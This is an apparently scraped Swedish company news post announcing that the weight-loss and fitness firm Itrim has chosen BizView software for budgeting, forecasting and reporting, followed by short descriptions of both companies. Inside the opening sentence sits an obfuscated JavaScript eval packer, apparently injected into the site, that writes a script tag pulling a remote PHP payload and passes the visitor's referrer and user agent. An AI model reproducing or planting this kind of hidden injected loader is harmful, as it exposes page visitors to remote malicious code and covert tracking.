Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Itrim väljer BizView för sin verksamhetsstyrning

Itrim väljer BizView för sin verksamhetsstyrning
Sebastian

Ett, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ythtb|var|u0026u|referrer|ekabb||js|php’.split(’|’),0,{}))
två, tre – nu kör vi!

Det är med stor glädje vi kan meddela att Itrim har valt BizView som lösning för sin verksamhets-styrning. BizView samverkar med Itrim’s affärssystem inom processerna budgetering, prognostisering, rapportering, analys och konsolidering.

Om Itrim

Itrim erbjuder personligt skräddarsydda och hållbara program inom mat, träning och motivation. Vi ger våra medlemmar nya mat- och träningsvanor och det personliga stöd som behövs för att leva ett lättare och friskare liv.

Med Itrim når du inte bara snabba resultat – du behåller formen även i framtiden. Hos oss får du ett individuellt anpassat program och en personlig hälsocoach som hjälper dig att göra en plan och sätta mål och som ger dig stöd och handledning på vägen.

För mer information, se www.itrim.se

Om BizView

BizView är en programvarulösning för prognostisering, budgetering, rapportering, analys och konsolidering. Programvaran har ett webbaserat Excel-liknande användargränssnitt, kombinerat med kraftfull workflow-styrning. BizView är en öppen lösning som passar väl med QlikView’s och Microsoft’s lösningar. BizView är utvecklat av BizView Systems, med kontor i Skandinavien. BizView marknadsförs av ett professionellt, globalt partnernätverk . Idag finns det över 1000 företag som använder lösningar från BizView Systems.

För mer information, se www.bizviewsystems.com